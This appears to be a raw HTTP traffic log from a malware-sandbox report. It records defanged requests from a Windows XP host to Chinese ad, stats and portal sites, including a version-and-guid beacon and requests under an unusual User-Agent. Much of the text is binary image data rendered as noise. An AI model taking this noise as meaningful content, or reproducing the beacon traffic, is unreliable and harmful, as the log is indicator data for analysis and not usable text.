Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cache.adm.cnzz.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: ATS/3.2.0

Date: Sun, 01 Jun 2014 03:33:42 GMT

Content-Type: text/html

Content-Length: 266

Location: hXXp://cache.adm.cnzz.net/noname.gif

Age: 2

Via: http/1.1 l2hk1 (ATS [cMsSf ]), http/1.1 de1 (ATS [cMsSf ])

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>302 Found</title></head>..<b
ody bgcolor="white">..<h1>302 Found</h1>..<p>The 
requested resource resides temporarily under a different URI.</p>
;..<hr/>Powered by Tengine/1.4.2..</body>..</html>..
....


GET /noname.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/shehui_509_366.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cache.adm.cnzz.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: ATS/3.2.0

Date: Sat, 31 May 2014 15:03:03 GMT

Content-Type: image/gif

Content-Length: 0

Last-Modified: Fri, 21 Oct 2011 09:36:11 GMT

Expires: Sat, 31 May 2014 20:29:04 GMT

Cache-Control: max-age=86400

Content-Disposition: : attachment;

Accept-Ranges: bytes

Age: 48508

Via: http/1.1 l2hk1 (ATS [cHs f ]), http/1.1 de1 (ATS [cRs f ])

Connection: keep-alive

.....

GET /material/d7/4/a9ac5ed3b828895d94097c8c6faba.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/shehui_509_366.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cache.adm.cnzz.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: ATS/3.2.0

Date: Sun, 01 Jun 2014 03:33:43 GMT

Content-Type: text/html

Content-Length: 266

Location: hXXp://cache.adm.cnzz.net/noname.gif

Age: 1

Via: http/1.1 l2hk1 (ATS [cMsSf ]), http/1.1 de1 (ATS [cMsSf ])

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>302 Found</title></head>..<b
ody bgcolor="white">..<h1>302 Found</h1>..<p>The 
requested resource resides temporarily under a different URI.</p>
;..<hr/>Powered by Tengine/1.4.2..</body>..</html>..
...

GET /web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver= HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:07 GMT

Content-Type: text/html

Content-Length: 1469

Connection: keep-alive

Last-Modified: Thu, 17 Apr 2014 15:55:27 GMT

Accept-Ranges: bytes

ETag: "80414a73555acf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<meta http-equiv="Content-Type" conten
t="text/html; charset=gb2312">..<title>................</t
itle>..<link href="newioage.css" rel="stylesheet" type="text/css
">..</head>..<body>..<p> </p>..<tab
le width="712" height="49" border="0" align="center" cellpadding="0" c
ellspacing="0">..  <tr>..    <td background="images/guide_
top.jpg"><table width="550" align="center">..        <tr&g
t;..          <td class="t14"><font color="#C8E2FF"><st
rong>................</strong></font></td>..     
   </tr>..      </table></td>..  </tr>..</t
able>..<table width="712" height="350" align="center" background
="images/texture.gif" bgcolor="#FFFFFF">..  <tr>..    <td 
valign="top">..<table width="500" align="center">..        &l
t;tr>..          <td><p class="t14"> </p>.. 
           <p class="t14"><font color="#D38C45" size="4">&
lt;strong>..............................</strong></font>
;</p>..            <p class="t14">........................
..................................................................<
/p>..            <p class="t14"> </p>..           
 </td>..        </tr>..      </table>..      <tab
le width="500" align="center">..        <tr> ..          <<< skipped >>>

GET /web/newioage.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:08 GMT

Content-Type: text/css

Content-Length: 715

Connection: keep-alive

Last-Modified: Thu, 17 Apr 2014 15:40:05 GMT

Accept-Ranges: bytes

ETag: "8038bc4d535acf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
body {background-color: #dddddd;margin-left: 0px;margin-top: 0px;margi
n-right: 0px;margin-bottom: 0px;}.td {font-size: 14px;line-height: 150
%;color: #666666;}..t12 {font-size: 12px;line-height: 150%;color: #666
666;}..A:link {font-size:12px;text-decoration:none;color: #1F72D0}.A:v
isited {font-size:12px;text-decoration:none;color: #1F72D0}.A:active {
font-size:12px;text-decoration: none;color: #033B7D}.A:hover {font-siz
e:12px;text-decoration:none;color: #FF5A00}..A.white:link {font-size:1
2px;text-decoration:none;color: #cfebff}.A.white:visited {font-size:12
px;text-decoration:none;color: #cfebff}.A.white:active {font-size:12px
;text-decoration: none;color: #ffffff}.A.white:hover {font-size:12px;c
olor: #feffcf}.....


GET /web/images/start_button.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:09 GMT

Content-Type: image/jpeg

Content-Length: 2304

Connection: keep-alive

Last-Modified: Thu, 17 Apr 2014 15:36:33 GMT

Accept-Ranges: bytes

ETag: "80965fcf525acf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
......JFIF.....d.d......Ducky.......P......Adobe.d....................
......................................................................
.......................................................#.m............
......................................................................
............!.#S...Te..a."1A2.Dd..Q...Bb$.%5.6.......................!
.1AQa....."B..2b#............?...4.N.U...DWU...T.....g9....&(...Y{p...
c.......7K.}...<....X.....m........;l.n.<...0y.`.t...........>
;....v...,y..`.....c.......N.Hv.nW2......B.&....S.. [email protected]....
......HQ.X.....m..1....\?(......Q.....<J..(.P:.4.%...".E.....Z:`t..
..\?..od.V..g.O....{[. .=......!{(..Wtz...~NY.......S...~*.E...OM.n6..
=..J|c.t..........sV....kF.uQJ...q...Z.C:#d.6...6.&.......S(mZX.Va.b&.
..Zk.][email protected].&&2vfE..x......Q.....M.g.#... ...Q.5-.J.Z2.....
.Tai..Qj.9....*4...JY4.U..S(....Z*.:.......|oj.R..$.Xg....*v..u\...E..
z..4.......C.s.."."...b,....W..L.qu\AG......(G......DQ..B..,K...F*(.$.
...d.AP......D.w.s{.{.K.........O.m....M.....?...^..k42..h..... ]*1.s0
.4...Q..,.n.,.nf..P.X.P.Q...p.!..4..L..n....%%^..mT..m....M....7.....T
.JnAw..c..#....3Lu.K9....T..= 1J %.p..ZY2.2%....F.5..Aj.KE..*....[..4}
?rsJ\.#.Q.......&.*....a..H..........".'.R.......J........?..Ylcf....}
...l....."....|..ah..s...w:.].<.z.....t.x...(I......Vc/...8j....k .
*...j..S.. `.....9._L..z.z..0..ih.z.....T.:[email protected] ... .c..Em..
.Y....`..........D.k=.....M....-.3....I.....Y..3......dTN.........n...
5.!.=B\.....I..V.U'....}#N-.*..O... .E.4d....I.n..n..T.....o..5..}<<< skipped >>>

GET /web/images/guide_top.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:10 GMT

Content-Type: image/jpeg

Content-Length: 5936

Connection: keep-alive

Last-Modified: Thu, 17 Apr 2014 15:48:06 GMT

Accept-Ranges: bytes

ETag: "0ff6e6c545acf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
......JFIF.....d.d......Ducky.......P......Adobe.d....................
......................................................................
.......................................................1..............
......................................................................
.......!1A.Qa.q.......2..."Rb3.B#C.rS....cD.........................!1
AQ..aq......."2.b..............?..k._..W..Sn.G..........s..."..Q3&....
...~.W...u.c...}...~.m...u.{.c.....!$}{..E=A......v.^C....].y....J\.d{
.>o............u..lg....O..?[...I..6o........~..I....m....G#.....{%
c.._......`i..~..:t.....}'.....\...M~.f....g.....z...:..)...{...v...m.
.<.$x..>7.....q5..v.;......Mv.\y...L[......m5..o...#.W.x.\qK'...
...].n.o.v>X`....w.V...._;G&.~...~.......G.Q.zQ.....,.JA.<\IY...
.og..<.5.h.[.W5.LN......s'....$..XP. &....S...........q........`.A.
..aC...H5...6A.%.......'...VL...&8...6Li..R.G.Z.O...T..(....w.l..a....
.-...P...2.O.....e...C.\{..l.xc....L.~..m.3...Y.....X.7L{.........l...
...#.Y ....p.#Sv..O.G0..n.../f...&....o.....k...!{u....N7.........."..
|B..kn.t.......~M..o...v...6,q..\..G.../ge.hk.b....>..7.G.......z.R
....n....|......\..\@.....SVg.sW.5fu....j..M.....Y];...9...v8. .......
.Y.;.......>l.#>*......b.;.v8... ] ..R.....X..HJ. .!......<.[
%.....(.!=...^N.......%...K./".-../$.jZX.};........t.NG5.......2rB.R(^
P.....n..|a....4..".$...x..v\ ..<..s.?Pz..........6..I..h.y..kI.sF.
..A ...........vL.....N.mn .......p..C0..5..&..5..@:..:.....&..a..-b.,
...L.}..6.'....I.........]V..v.........N..........^../.......CwF;}<<< skipped >>>

GET /img/news_photo/2014/05/29/mE8bXnNioe2802.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: pic4.xcarimg.com

Connection: Keep-Alive



.q.%!..RR.Y*...(=;#)..K..;!...F...m..v....;..T.c...JE.fr.......{.)....
.{...s....%)kl.m...5..m..U....z.v[y.%..f.S..i.a...:G.jeG....0.,.1.22.'
T..nsj.u.c.&..64.....8].*....L..,.CR.!iB...d.A..A.....e....W./.....m..
-....}*)..v.z28......"[email protected]....;.....D..%..E(J..h%...HY.......
..RR"F......!...<..$! . ().[...s..".......p...JN....B.m...ze.....{.
..S.""^E.h...@7 ..>"..Op7S........%..z............>$.h1....yL.%.
!...z..O.O.x......[..d..^o...."Ci'.S.-#..Z.O.....L}...q..H.....wg..bC.
z..>/p.9.4.l..o.rJQ.. ...T.S;}.....>-..h!&m..AJ.....A.'...I._..j
....0;........B.4.6.......g{..%.!>..Z..Aq.4...).Z....K....d.y.4.^..
; ..L`..._.A...c......$r..PeP(..... .H?h..T(j..l..I......q...Z.....S..
...i?....(;[email protected]([email protected](?..HTTP/1.1 200 OK..Expires: Sun, 3
1 May 2015 16:34:13 GMT..Date: Sat, 31 May 2014 16:34:13 GMT..Server: 
Apache..Last-Modified: Thu, 29 May 2014 03:31:22 GMT..Cache-Control: m
ax-age=31536000..Content-Type: image/jpeg..Content-Length: 3226..Accep
t-Ranges: bytes..Xcar-Cache-Server: imgcache1-HIT..Age: 1..X-Via: 1.1 
zjjhdx36:8080 (Cdn Cache Server V2.0), 1.1 dls21:0 (Cdn Cache Server V
2.0)..Connection: keep-alive..........Exif..II*.................Ducky.
......<.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." 
id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:met
a/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00   
     "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syn
tax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns<<< skipped >>>

GET /imgn/v32/selogo_111207.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p8.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/png

Content-Length: 12155

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......<<< skipped >>>

GET /imgn/tips/skin_tips_n1.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p8.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:27 GMT

Content-Type: image/gif

Content-Length: 1779

Last-Modified: Wed, 20 Jun 2012 04:23:22 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:27 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89af.!../......Z..R.....K...........P.....Y.....}..................
.......................^...........S...........l.....W..L........m....
.......f.........................................................!..XM
P DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> &
lt;x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060
 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="ht
tp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf
:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.ad
obe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:018011740720681191
09DDF35EE18454" xmpMM:DocumentID="xmp.did:B01789E6890511E18530B51A3723
DDED" xmpMM:InstanceID="xmp.iid:B01789E5890511E18530B51A3723DDED" xmp:
CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom 
stRef:instanceID="xmp.iid:02801174072068119109DDF35EE18454" stRef:docu
mentID="xmp.did:01801174072068119109DDF35EE18454"/> </rdf:Descri
ption> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
;.....................................................................
.............................................................~}|{zyxwv
utsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876
543210/.-, *)('&%$#"! .................................!...../.,....f.
!......pH,...$q.l:...4i.....vK<<...xL.1>..y.... ........k/2..
.(..........{.........B.$)..........{!......./....................<<< skipped >>>

GET /miniindex/ HTTP/1.1

User-Agent: hello crazyk

Host: VVV.mdtxw.org


HTTP/1.1 200 OK

Content-Length: 10093

Content-Type: text/html

Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html

Last-Modified: Thu, 22 May 2014 11:22:12 GMT

Accept-Ranges: bytes

ETag: "684ac813b075cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:34 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">...<head>....<meta http
-equiv="Content-Type" content="text/html; charset=gb2312">....<m
eta http-equiv="Cache-Control" content="no-cache">....<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">...
.<title>..........</title>....<link href="inc/stylemini
.css" rel="stylesheet" type="text/css">....<script src="inc/jque
ry-1.7.2.min.js" type="text/javascript"></script>....<base
 target="_blank">..<script type="text/javascript"> ..<!-- 
..//..........//document.oncontextmenu=function(e){return false;}..//.
...........var cusi=0;..var tiaozuan=1;..var timer;..//..............v
ar bq_array = new Array();..//........,....id,........url,............
(1....,..............class) ......url ......bq_array.push(["....","0",
"","0","","0"]);..bq_array.push(["....","105","hXXp://VVV.jgtj.com.cn/
ll","0","xinwen.htm","0"]);..bq_array.push(["....","101","hXXp://VVV.j
gtj.com.cn/ll","0","nvxing_509_366.htm","0"]);..bq_array.push(["....",
"102","hXXp://VVV.jgtj.com.cn/ll","0","lieqi_509_366.htm","0"]);..bq_a
rray.push(["....","100","hXXp://VVV.jgtj.com.cn/ll","0","shehui_509_36
6.htm","0"]);..bq_array.push(["....","120","hXXp://VVV.jgtj.com.cn/ll"
,"0","jiankang_509_366.htm","0"]);..bq_array.push(["....","130","http:
//VVV.jgtj.com.cn/ll","0","meinv.htm","0"]);..bq_array.push(["....<<< skipped >>>

GET /imgn/v32/setskinbg.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p3.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:28 GMT

Content-Type: image/gif

Content-Length: 397

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:28 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

GIF89a................................................................
.......................................!.......,............%.di.Y..l.
bp,.tl.x..x.....G)....q.l:...dJ.Z...v..z...xL.....z.n....|N.....~.....
.......................\..............................................
.............................................................H......:X
......#Jd......3j...".. C..I....(G.FX.....,C..;HTTP/1.1 200 OK..Server
: nginx/1.4.1..Date: Sun, 01 Jun 2014 03:33:28 GMT..Content-Type: imag
e/gif..Content-Length: 397..Last-Modified: Wed, 20 Jun 2012 04:23:24 G
MT..Connection: keep-alive..Expires: Tue, 01 Jul 2014 03:33:28 GMT..Ca
che-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a............
......................................................................
.....................!.......,............%.di.Y..l.bp,.tl.x..x.....G)
....q.l:...dJ.Z...v..z...xL.....z.n....|N.....~.......................
.....\................................................................
...........................................H......:X......#Jd......3j.
..".. C..I....(G.FX.....,C..;....

GET /imgu/2014/05/20140527160745_754.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p3.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/jpeg

Content-Length: 7281

Last-Modified: Tue, 27 May 2014 08:07:45 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
......Exif..II*.................Ducky.......W.....rhXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c06
0 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns
:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.
com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0
/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:AF6CF914E48311E3
BD25D4EF302F3A49" xmpMM:InstanceID="xmp.iid:AF6CF913E48311E3BD25D4EF30
2F3A49" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:De
rivedFrom stRef:instanceID="uuid:5CC35DF47A56E31182D2D115CBBA3EF6" stR
ef:documentID="uuid:5BC35DF47A56E31182D2D115CBBA3EF6"/> </rdf:De
scription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"
?>...&Adobe.d............................o.........................
......................................................................
.............................................k._......................
.................................................................... .
1.!.2.".A0#3$5.6........................!1.AQa". .2..q..Br#.Rb...3Cc..
.....s4D...................@`..!.P1....................!1AQa. .q......
...................].'./.e&p........\H.....)|2....;....s....N..Y..s.]V
.d.|...Q`.i$.3....O.........\.T1.nH..c..vA.V.|.C...7f.!...4.......<<< skipped >>>

GET /miniindex/images/aaa5.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 71321

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:51 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:10:25....................
.................................................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'[email protected][email protected]..../..d.
v.;...q.h.#!.m.....;......Y..... Z~..7z?O....wu7.....S..Y.m.d{.=../...
m..........o..{......m.f....-yu.|.$..s......?.P...~.}_...znP}.....k..I
>..........k.....Ll..o.#..UuD:.Xv......~.}l.... ."..q......O.Y,h.,.
k............u.6..{@..#...l?..~.e..-~K=#.M...[.......H....^...?.......
f.[_H%. <....l....p..r..6m/{a.N. .5.8......9.u...@....'.;..Wg..]lT.
............9...o.uW.Q..a.... ........YV3.<..n.ZD~...Z.....)..iu.s.
..O...}..&...O%..:.6.q..WI.o...Uf...:X..'rfB"......Y..I..v.......k7.5.
.....:L..&>j.X.SN=T.U]O%..F.d.....MN....j......?9.*...y.1..b<..g
:.dd.............T`<.,.ku....r...Z0.,8....,{.u.2.\...OQq..[....<<< skipped >>>

GET /miniindex/images/aaa10.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 23965

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:55 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:28:23....................
.........}...........~...........................................&.(..
...............................Z.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..Y. Cn..gE.Y.K.\i..6.[[..........4
.E/?.x.-|[email protected]..(...{....;}....}N.9....`. R5...-...eD{~%Qn#...zGU.&g
t;...l..5h.p...8.".. F......j.>...]`..vCvC..H........T.:1S3xp......
88...(...]..E).a .9B.......%:r.f.............;][email protected]
he..;g.T=J6.=_.z...`.=..N.,l..R.S..L.<O.n...../...p.F..QH.  r.1..]W
[email protected]>......
Vw....{.....9...;ts7.Ut....O.`S.qD~ .8I.Z.D.......?*.~.tS.]v63........
gf...ee.:..&7Y.W._.[]l...!.p..X.W..r#....W...f.... .....z^e..me...H...
b...,.7p.4.)..q..!.q%.9WEpF..c...M{m..........{.[p.5!.. [email protected]
..>....B7...P....1....q...<d.....|..i........89.....U..5ul.7<<< skipped >>>

GET /miniindex/inc/style.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

